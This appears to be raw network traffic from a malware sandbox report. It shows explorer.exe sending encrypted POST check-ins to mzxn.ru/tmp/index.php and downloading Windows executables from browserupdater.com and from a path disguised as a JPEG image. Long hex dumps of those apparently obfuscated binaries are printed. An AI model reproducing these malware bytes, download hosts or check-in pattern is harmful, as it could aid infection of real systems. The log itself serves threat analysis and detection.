                          Referer: http://nddnnutqhypaj.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 217
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:44.320075035 CEST217OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 31 d8 ac
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuA1YDllc^F5_5{]EwavVL]XO'*Kgp^kcK5^^1Q)u3QuBm"
                          Aug 6, 2024 14:51:45.563690901 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:45 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          36192.168.2.449777190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:49.217453003 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://nmxuerpvqdsp.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 315
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:49.217482090 CEST315OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 33 b2 e5
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu]3r]@rMf*PQ{H})-{CQ<H9z]!*i(&&h6S&->,<B0u"jQzNcPFBb
                          Aug 6, 2024 14:51:50.452819109 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:50 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          37192.168.2.449778190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:54.156217098 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://hmylssppqcui.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 337
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:54.156244040 CEST337OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 5a c6 a2
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuVZI^GBviKn",k~nD4+1{"<>j4C2tbWM)rSjAO):DB1oC-dMuCC!m[,.
                          Aug 6, 2024 14:51:55.336523056 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:55 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          38192.168.2.449779190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:59.424931049 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://viiuigfvqxtv.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 152
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:59.424964905 CEST152OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 59 0b cd fb
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuYxDdyK:K$<:*\Bq,DJ8]n/X^[b1[I
                          Aug 6, 2024 14:52:00.583287001 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:52:00 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44975145.130.41.2504432580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          2024-08-06 12:48:51 UTC165OUTGET /build.exe HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Host: browserupdater.com
                          2024-08-06 12:48:51 UTC337INHTTP/1.1 200 OK
                          Server: nginx-reuseport/1.21.1
                          Date: Tue, 06 Aug 2024 12:48:51 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2064896
                          Last-Modified: Fri, 02 Aug 2024 22:46:26 GMT
                          Connection: close
                          ETag: "66ad61c2-1f8200"
                          Expires: Thu, 05 Sep 2024 12:48:51 GMT
                          Cache-Control: max-age=2592000
                          Accept-Ranges: bytes
                          2024-08-06 12:48:51 UTC16047INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 5b 61 ad 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 00 00 00 64 1d 00 00 7e 1f 00 00 60 06 00 9a 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 50 26 00 00 04 00 00 2a fb 1f 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd[af.d~`@P&*`
                          2024-08-06 12:48:51 UTC16384INData Raw: 91 03 b5 48 31 c1 48 89 d0 48 01 c8 48 89 44 24 38 49 89 d0 49 83 f0 ff 48 b9 a7 a4 88 04 09 43 98 69 49 b9 58 5b 77 fb f6 bc 67 96 4c 31 c9 4c 21 c1 49 b8 d7 29 80 69 65 1f d2 a9 49 b9 28 d6 7f 96 9a e0 2d 56 4d 31 c8 49 b9 f4 97 8f fe 9f a1 6d fb 49 ba 0b 68 70 01 60 5e 92 04 4d 31 d1 4d 31 c8 4c 21 c2 48 09 d1 48 21 c8 48 83 f8 00 0f 8d 14 00 00 00 e8 8e 30 00 00 48 8b 44 24 28 48 89 44 24 50 e9 24 00 00 00 48 8b 44 24 28 48 8b 54 24 38 48 8b 4c 24 30 4c 8b 44 24 48 49 89 10 48 8b 09 c6 44 11 08 00 48 89 44 24 50 48 8b 4c 24 48 48 8b 54 24 50 48 83 c4 58 e9 10 ee ff ff 48 83 ec 28 48 89 c8 48 89 44 24 20 48 b8 8a f3 2b 61 67 bc 05 55 49 b8 8a f3 2b 61 67 bc 05 55 4c 31 c0 48 89 01 48 c7 41 08 00 00 00 00 e8 83 fe ff ff 48 8b 44 24 20 48 83 c4 28 c3 48
                          Data Ascii: H1HHHD$8IIHCiIX[wgL1L!I)ieI(-VM1ImIhp`^M1M1L!HH!H0HD$(HD$P$HD$(HT$8HL$0LD$HIHDHD$PHL$HHT$PHXH(HHD$ H+agUI+agUL1HHAHD$ H(H
                          2024-08-06 12:48:52 UTC16384INData Raw: 88 8c 24 9f 00 00 00 3d 8d cf 31 da 0f 87 36 ff ff ff 8a 84 24 9f 00 00 00 a8 01 0f 85 05 00 00 00 e9 25 00 00 00 48 8b 84 24 b0 00 00 00 48 c7 80 a8 28 00 00 00 40 00 00 b8 00 40 00 00 48 89 84 24 a0 00 00 00 e9 a1 00 00 00 48 8b 94 24 90 00 00 00 48 b9 13 37 d9 e4 b3 c8 8d 25 48 b8 11 37 d9 e4 b3 c8 8d 25 48 31 c1 48 d3 ea 48 8b 8c 24 b0 00 00 00 48 81 c2 ff 0f 00 00 49 b8 11 25 7c 8e 9f 9a db 08 48 b8 11 d5 83 71 60 65 24 77 49 31 c0 48 b8 c3 1c 64 fe ad 46 1b 5c 49 b9 3c e3 9b 01 52 b9 e4 a3 4c 31 c8 49 31 c0 48 89 d0 4c 31 c0 48 21 d0 48 8b 91 a8 28 00 00 48 c1 e2 01 49 89 c0 49 29 d0 48 0f 4c d0 48 89 d0 48 2d 00 00 00 3f b8 00 00 00 3f 48 0f 4c c2 48 89 81 a8 28 00 00 48 89 84 24 a0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 b0 00 00 00 48 8b 84
                          Data Ascii: $=16$%H$H(@@H$H$H7%H7%H1HH$HI%|Hq`e$wI1HdF\I<RL1I1HL1H!H(HII)HLHH-??HLH(H$H$H$H
                          2024-08-06 12:48:52 UTC16384INData Raw: 00 00 00 48 8b 84 24 b8 00 00 00 48 89 c1 48 83 c1 48 48 89 8c 24 90 00 00 00 4c 8b 48 48 4c 89 c8 48 21 d0 48 c1 e0 01 4c 89 c9 48 31 d1 48 01 c1 48 89 8c 24 98 00 00 00 49 89 c8 49 83 f0 ff 4c 89 c8 4c 21 c0 49 83 f1 ff 49 89 c8 4d 21 c8 4c 09 c0 48 31 d1 48 21 c8 48 83 f8 00 0f 8c 28 08 00 00 4c 8b 84 24 b8 00 00 00 48 8b 94 24 c0 00 00 00 48 8b 8c 24 c8 00 00 00 48 8b 84 24 90 00 00 00 4c 8b 8c 24 98 00 00 00 4c 89 08 e8 24 08 00 00 48 8b 84 24 d0 00 00 00 80 38 00 0f 85 ec 07 00 00 48 8b 84 24 b8 00 00 00 48 8d 8c 24 e0 00 00 00 48 83 c1 08 48 89 8c 24 80 00 00 00 48 83 c0 40 48 89 84 24 88 00 00 00 48 8b 84 24 b8 00 00 00 48 83 38 00 0f 8e b2 07 00 00 8b 05 75 ba 1c 00 35 7c 89 c7 39 8b 15 6e ba 1c 00 89 d1 21 c1 83 f1 ff 01 d0 83 c0 01 01 c8 b9 65
                          Data Ascii: H$HHHH$LHHLH!HLH1HH$IILL!IIM!LH1H!H(L$H$H$H$L$L$H$8H$H$HH$H@H$H$H8u5|9n!e
                          2024-08-06 12:48:52 UTC16384INData Raw: 89 c0 48 29 c8 48 89 45 00 48 89 c2 48 83 f2 ff 4c 89 c9 48 21 d1 49 83 f1 ff 48 89 c2 4c 21 ca 48 09 d1 49 89 c1 49 83 f1 ff 4c 89 c2 4c 21 ca 49 83 f0 ff 4c 21 c0 48 09 c2 48 89 c8 48 83 f0 ff 49 b8 de 94 e2 d8 7d ef ec 16 49 b9 21 6b 1d 27 82 10 13 e9 4d 31 c8 4c 31 c1 48 21 c8 48 89 d1 48 83 f1 ff 48 83 f2 ff 48 21 d1 48 09 c8 48 83 f0 ff 48 83 f8 00 0f 8d 18 00 00 00 48 83 ec 20 e8 83 70 ff ff 48 83 c4 20 31 c0 48 89 45 40 e9 7d 07 00 00 4c 8b 45 18 48 8b 55 08 48 8b 4d 00 48 83 ec 20 e8 cc ef ff ff 48 83 c4 20 48 89 45 40 e9 5b 07 00 00 48 8b 45 30 48 8b 00 48 ba 27 fa de ff 13 20 83 d2 48 b9 d8 05 21 00 ec df 7c 2d 48 31 ca 48 89 c1 48 31 d1 48 c7 c2 ff ff ff ff 49 b8 ff ff ff ff ff ff ff bf 4c 31 c2 48 09 d1 48 ba dd c1 20 df d9 1b 39 f1 49 b8 22
                          Data Ascii: H)HEHHLH!IHL!HIILL!IL!HHHI}I!k'M1L1H!HHHH!HHHH pH 1HE@}LEHUHMH H HE@[HE0HH' H!|-H1HH1HIL1HH 9I"
                          2024-08-06 12:48:52 UTC16384INData Raw: f0 05 2a 12 36 44 21 c2 83 f0 ff 83 f2 ff 21 d0 48 ba b3 96 a2 da d5 d7 bc 64 49 b8 44 69 5d 25 2a 28 43 9b 4c 31 c2 48 39 d1 0f 9c c1 88 4c 24 2f 3d 06 12 20 b3 0f 83 70 ff ff ff 8a 44 24 2f a8 01 0f 85 05 00 00 00 e9 10 00 00 00 4c 89 c1 4c 89 c2 e8 a9 79 ff ff e9 ee 02 00 00 4c 8b 4c 24 40 4c 89 c9 48 83 c1 01 4c 89 ca 48 83 f2 ff 48 b8 cf d5 63 a2 78 65 b7 cc 48 21 c2 49 c7 c0 ff ff ff ff 48 b8 cf d5 63 a2 78 65 b7 cc 49 31 c0 4d 21 c1 48 b8 6c 2a 3d e8 23 7a 70 a4 49 ba 93 d5 c2 17 dc 85 8f 5b 4c 31 d0 49 ba 33 f4 ef 54 c8 73 2b 6f 49 bb cc 0b 10 ab 37 8c d4 90 4d 31 da 4c 31 d0 49 ba b4 2a ba 93 de 83 ef 56 49 bb 7b ff d9 31 a6 e6 58 9a 4d 31 da 4c 21 d0 49 83 e0 ff 4c 09 ca 4c 09 c0 48 31 c2 48 83 f2 ff 48 89 c8 48 31 d0 48 21 c8 48 83 f8 00 0f 8d
                          Data Ascii: *6D!!HdIDi]%*(CL1H9L$/= pD$/LLyLL$@LHLHHcxeH!IHcxeI1M!Hl*=#zpI[L1I3Ts+oI7M1L1I*VI{1XM1L!ILLH1HHH1H!H
                          2024-08-06 12:48:52 UTC16384INData Raw: c1 01 48 89 4c 24 28 49 b8 ae 2f 73 5f 6b 12 b2 b1 48 ba 51 d0 8c a0 94 ed 4d 4e 49 31 d0 48 89 c2 4c 31 c2 49 89 c0 49 83 f0 ff 4c 21 c2 49 c7 c0 ff ff ff ff 49 83 c8 ff 49 83 f0 ff 4c 09 c2 48 83 f2 ff 49 b8 84 bd 5f c1 80 18 ac a5 49 b9 7b 42 a0 3e 7f e7 53 5a 4d 31 c8 4c 31 c0 49 b8 8d 9d ea 0b 92 61 6c 6e 49 b9 72 62 15 f4 6d 9e 93 91 4d 31 c8 49 b9 19 3b cc ee a0 8b b0 dd 49 ba e6 c4 33 11 5f 74 4f 22 4d 31 d1 4d 31 c8 4c 21 c0 48 83 f2 ff 48 83 f0 ff 48 21 c2 48 89 c8 48 21 d0 49 b8 63 c9 f7 9d df 47 1a 28 49 b9 9c 36 08 62 20 b8 e5 d7 4d 31 c8 4c 31 c0 48 21 d1 48 83 f1 ff 48 ba cd ed fb 27 28 3b 89 db 49 b8 32 12 04 d8 d7 c4 76 24 4c 31 c2 48 31 d0 48 ba 19 c6 5f 0b 8e 11 c1 9e 49 b8 e6 39 a0 f4 71 ee 3e 61 4c 31 c2 48 31 d1 48 09 c8 48 83 f8 00
                          Data Ascii: HL$(I/s_kHQMNI1HL1IIL!IIILHI_I{B>SZM1L1IalnIrbmM1I;I3_tO"M1M1L!HHH!HH!IcG(I6b M1L1H!HH'(;I2v$L1H1H_I9q>aL1H1HH
                          2024-08-06 12:48:52 UTC16384INData Raw: ff ff 81 f2 a5 08 8b 6f 09 d0 81 e1 a5 08 8b 6f 83 f1 ff 21 c8 83 f0 ff b9 fe cb 91 78 81 f1 d9 ea c6 a7 31 d2 f7 f1 b9 30 8f e2 f0 81 f1 79 ef 16 ee 29 c8 89 44 24 34 b8 98 24 f1 74 35 52 0d a0 24 89 44 24 30 e8 be b0 fe ff 8b 4c 24 30 8b 44 24 34 39 c8 0f 86 3d 00 00 00 e9 32 00 00 00 48 8b 54 24 40 48 8b 44 24 50 4c 8b 44 24 48 4c 8b 4c 24 68 48 8b 4c 24 38 4d 89 08 48 83 c1 08 48 6b c0 38 48 01 c1 41 b8 38 00 00 00 e8 57 a8 1b 00 90 48 83 c4 78 c3 78 35 ca b7 e9 3c ff ff ff 48 83 ec 28 e8 db d9 fe ff b9 40 00 00 00 ba 08 00 00 00 e8 a8 54 ff ff 48 89 c1 48 8b 05 8e 1c 1d 00 48 89 01 48 8d 05 be 89 1c 00 48 89 41 10 48 c7 41 18 00 00 00 00 48 8d 05 61 89 1c 00 48 89 41 20 48 ba 29 9c db 7b b3 4e 0e b8 48 b8 20 29 e1 0c b3 4e 0e b8 48 31 c2 48 89 e0 48
                          Data Ascii: oo!x10y)D$4$t5R$D$0L$0D$49=2HT$@HD$PLD$HLL$hHL$8MHHk8HA8WHxx5<H(@THHHHHAHAHaHA H){NH )NH1HH
                          2024-08-06 12:48:52 UTC16384INData Raw: 41 21 d0 b9 cd de 91 ba 81 f1 1f fb db 61 41 b9 46 3e 2e 84 41 81 f1 b9 c1 d1 7b 44 31 c9 81 e1 ab 88 d6 3f 81 e2 d2 25 4a db 44 09 c0 09 d1 31 c8 3d ba a9 51 33 0f 84 61 ff ff ff 48 8b 44 24 28 48 89 44 24 40 e9 1e fc ff ff 48 81 c4 b0 00 00 00 5e c3 f3 12 0e b9 e9 9e f7 ff ff ea f7 3b 80 e9 5f f8 ff ff 50 01 84 9b e9 34 fa ff ff 81 d8 ea d1 e9 97 fc ff ff 79 cb 7a 24 e9 b3 fd ff ff 92 15 1f 92 e9 13 ff ff ff 48 83 ec 38 48 89 54 24 30 48 89 4c 24 28 31 c0 89 c2 e8 80 f1 ff ff 48 8b 4c 24 28 48 8b 54 24 30 48 83 c4 38 e9 7d f6 ff ff 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 68 48 89 4c 24 48 e8 b6 99 fe ff 48 8b 4c 24 48 48 83 c0 60 48 89 44 24 50 48 83 c1 08 48 89 4c 24 58 31 c0 48 89 44 24 60 48 8b 54 24 58 48 8b 4c 24 48 48 8b 44 24 60 48 89 44
                          Data Ascii: A!aAF>.A{D1?%JD1=Q3aHD$(HD$@H^;_P4yz$H8HT$0HL$(1HL$(HT$0H8}ffff.HhHL$HHL$HH`HD$PHHL$X1HD$`HT$XHL$HHD$`HD
                          2024-08-06 12:48:52 UTC16384INData Raw: b9 98 31 c9 a3 81 f1 5b a3 b3 ca 31 c8 2b 05 fa 44 1b 00 89 c1 81 e1 d2 6c 2c 35 ba ed 2f 56 0f 81 f2 12 d0 a9 f0 31 d1 ba d9 45 83 db 81 f2 0b 29 af ee 01 d0 83 c0 01 01 c8 b9 fd 12 c7 18 31 d2 f7 f1 b9 a9 46 92 17 31 d2 f7 f1 3d fe 88 74 64 0f 87 e3 02 00 00 8b 0d b4 44 1b 00 8b 15 b2 44 1b 00 89 d0 21 c8 83 f0 ff 01 d1 83 c1 01 01 c1 b8 ff ff ff ff 35 a3 8b 09 25 01 c1 83 c1 01 b8 fc 7e 45 64 35 ff 72 43 8c 0f af c8 89 c8 83 f0 ff ba c2 a5 37 79 81 f2 3d 5a c8 86 31 d1 21 c8 b9 b7 56 31 35 81 f1 6f f1 b8 e8 ba 84 c9 75 11 81 f2 7b 36 8a ee 31 d1 ba c0 c0 5c e4 81 f2 18 67 d5 39 41 b8 82 21 95 fe 41 81 f0 7d de 6a 01 44 31 c2 21 d1 83 f0 ff ba 7e de 94 33 81 f2 81 21 6b cc 31 d1 21 c8 89 44 24 40 b8 20 c6 eb 60 35 14 b5 fc ba 89 44 24 3c 48 8d 8c 24 98
                          Data Ascii: 1[1+Dl,5/V1E)1F1=tdDD!5%~Ed5rC7y=Z1!V15ou{61\g9A!A}jD1!~3!k1!D$@ `5D$<H$


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449754185.149.100.2424432580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          2024-08-06 12:48:58 UTC179OUTGET /wp-content/images/pic5.jpg HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Host: mussangroup.com
                          2024-08-06 12:48:58 UTC451INHTTP/1.1 200 OK
                          Connection: close
                          cache-control: public, max-age=604800
                          expires: Tue, 13 Aug 2024 12:48:58 GMT
                          content-type: image/jpeg
                          last-modified: Fri, 02 Aug 2024 22:42:26 GMT
                          accept-ranges: bytes
                          content-length: 2097152
                          date: Tue, 06 Aug 2024 12:48:58 GMT
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2024-08-06 12:48:59 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 bf 60 ad 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 00 00 00 d8 1d 00 00 fc 1f 00 00 60 06 00 9a 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 26 00 00 04 00 00 dc 08 20 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd`f.`@& `
                          2024-08-06 12:48:59 UTC16384INData Raw: 7b 00 00 00 b9 40 00 00 00 ba 08 00 00 00 e8 b6 0e 01 00 48 89 c1 48 8b 05 13 1a 1f 00 48 89 01 48 8d 05 b1 86 1e 00 48 89 41 10 48 8b 05 de 86 1e 00 48 89 41 18 48 8b 05 db 86 1e 00 48 89 41 20 48 c7 41 08 00 00 00 00 48 b8 9b bc a9 d9 6e 2a ee 15 48 ba 25 78 12 e8 6e 2a ee 15 48 31 d0 48 8d 15 71 86 1e 00 4c 8d 05 81 86 1e 00 4c 8d 0d 87 86 1e 00 48 89 44 24 20 e8 9b 0d 01 00 90 48 83 c4 68 c3 48 83 ec 28 48 8b 05 a0 1c 1f 00 8b 08 e8 2c 37 00 00 48 83 c0 60 48 83 c4 28 c3 56 48 83 ec 40 48 89 4c 24 38 8b 15 40 a7 1d 00 8b 0d 3e a7 1d 00 89 d0 83 f0 ff 83 f2 ff 09 d0 21 c9 83 f1 ff 21 c8 83 f0 ff b9 91 f5 6a 8f 31 d2 f7 f1 2d 86 ee dd 9d 2d 30 55 a4 91 b9 6e e2 b4 f0 81 f1 e8 0c 69 6d 01 c8 ba e6 09 83 ad 81 f2 73 0c b4 d8 89 c1 21 d1 c1 e1 01 05 95 05
                          Data Ascii: {@HHHHHAHHAHHA HAHn*H%xn*H1HqLLHD$ HhH(H,7H`H(VH@HL$8@>!!j1--0Unims!
                          2024-08-06 12:48:59 UTC16384INData Raw: 4d 08 8a 55 ef 88 14 01 48 b9 39 87 7a 81 24 43 63 d5 48 ba 29 1d f0 de d8 ef 1f 12 48 31 d1 48 29 c8 48 83 c0 01 48 b9 10 9a 8a 5f fc ac 7c c7 48 01 c8 48 89 45 f8 e9 66 ff ff ff 48 8b 4d f0 48 8b 45 08 c6 04 08 40 31 c0 48 89 4d d8 48 89 45 e0 48 8b 45 d8 48 8b 4d e0 48 89 4d c8 48 89 45 d0 8b 05 a0 69 1d 00 8b 15 9e 69 1d 00 89 c1 31 d1 83 f1 ff 09 d0 21 c8 89 c1 83 f1 ff ba ef b5 34 9b 81 f2 d3 14 20 19 21 ca 41 b8 ff ff ff ff 41 81 f0 3c a1 14 82 89 c1 44 21 c1 0f af ca 89 c2 81 e2 3c a1 14 82 0d 3c a1 14 82 0f af c2 01 c8 ba 5b 69 32 54 81 f2 a4 96 cd ab 89 c1 31 d1 ba 7f 5e ab 48 81 f2 a0 40 3f 63 21 ca 41 b8 ff ff ff ff 41 81 f0 df 1e 94 2b 89 c1 44 21 c1 0f af ca 89 c2 81 e2 df 1e 94 2b 0d df 1e 94 2b 0f af c2 01 c8 89 c2 83 f2 ff 81 e2 57 ec 86
                          Data Ascii: MUH9z$CcH)H1H)HH_|HHEfHMHE@1HMHEHEHMHMHEii1!4 !AA<D!<<[i2T1^H@?c!AA+D!++W
                          2024-08-06 12:48:59 UTC16384INData Raw: bf 57 4a 44 3c 81 f7 a8 b5 bb c3 89 f0 31 f8 83 f6 ff 09 f0 45 21 c9 be 77 4e 03 87 81 f6 88 b1 fc 78 41 31 f1 be c0 2f 77 7f 81 f6 3f d0 88 80 31 f0 41 83 f1 ff 44 09 c8 35 37 e4 94 8c 05 da 51 86 d0 2d 68 86 ec 7e 2d da 51 86 d0 45 31 c9 41 81 e9 b8 dd 0e f8 44 01 c8 49 89 c9 49 83 c1 30 4c 89 4c 24 30 4c 8b 49 30 49 c1 e3 04 4c 89 c9 4c 01 d9 49 c1 e2 04 4d 01 d1 4d 8b 11 4c 89 11 4d 8b 49 08 4c 89 49 08 49 b9 b9 5c 31 d7 66 f8 40 17 48 b9 46 a3 ce 28 99 07 bf e8 49 31 c9 48 89 d1 4c 31 c9 4d 89 c1 49 83 f1 ff 4c 09 c9 4c 21 c2 48 83 f2 ff 48 83 f1 ff 49 b8 5c c5 d5 3e c0 e4 0e 17 49 b9 a3 3a 2a c1 3f 1b f1 e8 4d 31 c8 4c 31 c2 48 09 d1 48 83 f9 00 0f 9c c1 88 4c 24 3f 3d ab 51 d5 47 0f 84 e9 fe ff ff 8a 44 24 3f a8 01 0f 85 05 00 00 00 e9 0a 00 00 00
                          Data Ascii: WJD<1E!wNxA1/w?1AD57Q-h~-QE1ADII0LL$0LI0ILLIMMLMILII\1f@HF(I1HL1MILL!HHI\>I:*?M1L1HHL$?=QGD$?
                          2024-08-06 12:48:59 UTC16384INData Raw: 15 bf ed 1c 00 41 89 c0 41 83 f0 ff 45 89 d1 45 21 c1 45 89 d3 41 83 f3 ff 41 89 c0 45 21 d8 45 0f af c1 41 89 c1 45 21 d1 44 09 d0 41 0f af c1 44 01 c0 25 1c b6 53 5c 05 f1 18 18 bd 05 4b af 24 e3 2d 83 1e 54 2b 41 b8 67 b8 2d be 41 81 f0 2c 17 09 5d 44 29 c0 48 39 d1 0f 9c c1 88 8c 24 e7 00 00 00 3d e7 c9 d8 b8 0f 83 69 ff ff ff 8a 84 24 e7 00 00 00 a8 01 0f 85 e2 00 00 00 e9 00 00 00 00 4c 8b 84 24 38 01 00 00 48 8b 94 24 e8 00 00 00 48 8b 84 24 f0 00 00 00 48 8b 00 49 89 d1 49 c1 e1 04 48 89 c1 4c 01 c9 48 8b 09 48 c1 e2 04 48 01 d0 48 83 c0 08 48 8b 10 e8 df dd ff ff 48 8b 84 24 10 01 00 00 8a 00 b1 f4 80 f1 f4 38 c8 0f 85 2f 09 00 00 48 8b 94 24 e8 00 00 00 48 b9 e1 7f af 4d a8 f7 bd 2d 48 b8 1e 80 50 b2 57 08 42 d2 48 31 c1 48 b8 0f c5 08 a1 e5 f3
                          Data Ascii: AAEE!EAAE!EAE!DAD%S\K$-T+Ag-A,]D)H9$=i$L$8H$H$HIIHLHHHHHH$8/H$HM-HPWBH1H
